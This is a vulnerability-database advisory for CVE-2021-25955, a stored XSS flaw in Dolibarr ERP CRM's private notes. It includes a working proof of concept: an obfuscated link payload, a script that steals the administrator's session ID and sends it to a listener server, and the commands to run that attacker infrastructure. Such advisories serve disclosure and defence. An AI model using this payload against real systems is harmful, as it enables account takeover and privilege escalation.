Mend Vulnerability Database

What is a CVE vulnerability ID? icon What is a WS vulnerability ID? icon What is an MSC vulnerability ID? icon
New vulnerability? Tell us about it!
icon

We found results for “

CVE-2021-25955

Date: August 15, 2021

Details

The “Dolibarr ERP CRM”, WYSIWYG Editor module is affected by a stored XSS vulnerability that allows low privileged application users to store malicious scripts in the Private Note field at “/adherents/note.php?id=1” endpoint. These scripts are executed in a victim’s browser when they open the page containing the vulnerable field.
In the worst case, the victim who inadvertently triggers the attack is a highly privileged administrator, so the injected scripts can extract the Session ID, which can lead to full Account takeover and as due to other vulnerability (Improper Access Control on Private notes) a low privileged user can update the private notes which could lead to privilege escalation.

PoC Details

For demonstration purposes we will use two users:
1. “member1” (permissions to “Read members” and “Create/modify members”)
2. “admin” (administrator).

Create a malicious JS file that sends session id to the attacker over a GET request.
Run a PHP Simple Server to host the malicious file.
Run a Python Simple HTTP Server to get the extracted Session ID.
Login to the application as member1. Go to My Dashboard option on the left pane and select member1 from the “Latest 5 members” section. Go to the Note option from the navigation bar and edit the public note, provide the payload in the field and capture the request with a web proxy (example: burp suite). Then modify the request captured above by converting public to private (in 3 parameters) and forward the request.
Login with “admin” user and go to the same endpoint and you will find that a private note has been created. Administrator clicks on the private note initiating the malicious script.
At our python server the attacker received the Session ID of the administrator. Using the Session ID captured above, the attacker can login as Administrator.

PoC Code

// Payload:
<a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;var re;x=new XMLHttpRequest;x.onload%0d=function(){var ur='http://192.168.18.37:8090/test.js';$.getScript(ur);};x.open('GET','http://192.168.18.36/');x.send();">Click to Get !!hacked!!</a>

// File (test.js) contents:
var te = /[0-9a-zA-Z]+/gm; 
var re;
x=new XMLHttpRequest;
x.onload=function(){
        re = this.responseText;
        var reg = /Session\sID\S+\s\S+/gm;
        console.log(((re.match(reg))[0].match(te))[6]);
        var sessionId=((re.match(reg))[0].match(te))[6];
        var url = "http://192.168.18.37:9999/" + sessionId;
        $.ajax(url);
};
x.open('GET','http://192.168.18.36/admin/system/dolibarr.php', true);
x.withCredentials = true;a
x.send(null);

// Command to run the Python Simple http Server to get the extracted Session ID.
Python3 –m http.server 9999

// Command to run the PHP Simple Server to host the malicious file.
php –S 192.168.18.37:8090

Affected Environments

2.8.1-13.0.2

Prevention

Upgrade to version 14.0.0

Language: PHP

Good to know:

icon

Cross-Site Scripting (XSS)

CWE-79
icon

Upgrade Version

Upgrade to version 14.0.0

Learn More

Base Score:
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): Low
User Interaction (UI): Required
Scope (S): Changed
Confidentiality (C): High
Integrity (I): High
Availability (A): High
Base Score:
Access Vector (AV): Network
Access Complexity (AC): Medium
Authentication (AU): Single
Confidentiality (C): None
Integrity (I): Partial
Availability (A): None
Additional information:

Related Resources (4)

https://github.com/Dolibarr/dolibarr/commit/796b2d201acb9938b903fb2afa297db289ecc93e
https://nvd.nist.gov/vuln/detail/CVE-2021-25955
https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25955
https://www.mend.io/vulnerability-database/CVE-2021-25955